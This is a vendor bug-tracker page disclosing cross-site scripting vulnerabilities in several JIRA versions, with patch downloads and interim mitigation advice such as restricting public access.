Uploaded image for project: 'Jira Data Center'
  1. Jira Data Center
  2. JRASERVER-20994

XSS Vulnerabilities in JIRA


    • Icon: Bug Bug
    • Resolution: Fixed
    • Icon: Highest Highest
    • 4.1.1, 4.2
    • 3.12, 3.12.1, 3.12.2, 3.12.3, 3.13, 3.13.1, 3.13.2, 3.13.3, 3.13.4, 3.13.5, 4.0, 4.0.1, 4.0.2, 4.1
    • None

      Warning: This issue is superceded by JRA-21004. Please install the patches on that issue, rather than this one.

      For more details, see JIRA Security Advisory - 2010-04-16.

      The security advisory also has details of how to determine if your JIRA installation has been compromised and another addendum on good system administration practices to protect your public JIRA installation. These additions are valuable even if you cannot apply the patch immediately.

      If you have already installed this patch, install JRA-21004 on top of this patch.

      We have identified vulnerabilities in JIRA which will allow an attacker to invoke XSS (Cross Site Scripting) attacks in JIRA. Some attacks possible with these vulnerabilities include:

      • An attacker might take advantage of the vulnerability to steal other users' session cookies or other credentials, by sending the credentials back to the attacker's own web server.
      • An attacker's text and script might be displayed to other people viewing the JIRA page.

      You can read more about XSS attacks at cgisecurity, CERT and other places on the web.

      We recommend that you apply the attached patch immediately to address these vulnerabilities.
      The Instructions to apply the patch is contained within the Readme file as part of the attached zip. Please download the appropriate patch for your version of JIRA (these patches have only been tested on the point releases specified in the zip filename). If you are not on the point release that the patch is created for, it is recommended that you first upgrade to the latest point release for your version of JIRA before applying the patch.

      Alternatively, if you are not in a position to undertake this immediately and you judge it necessary, you could disable public access to JIRA (for example, by removing appropriate global or project-specific 'Anyone' permissions) and change JIRA's mode to disable public signup) until you have either applied the necessary patches. For even tighter control, you could restrict access to trusted groups.

      If you are applying this patch, we also recommend you apply the patch for JRA-20995.

        1. patch-JRA-20994-3_12_3.zip
          18 kB
        2. patch-JRA-20994-3_13_4.zip
          18 kB
        3. patch-JRA-20994-3_13_5.zip
          19 kB
        4. patch-JRA-20994-4_0_2.zip
          21 kB
        5. patch-JRA-20994-4_1.zip
          24 kB

            Unassigned Unassigned
            edwin@atlassian.com edwin
            3 Vote for this issue
            24 Start watching this issue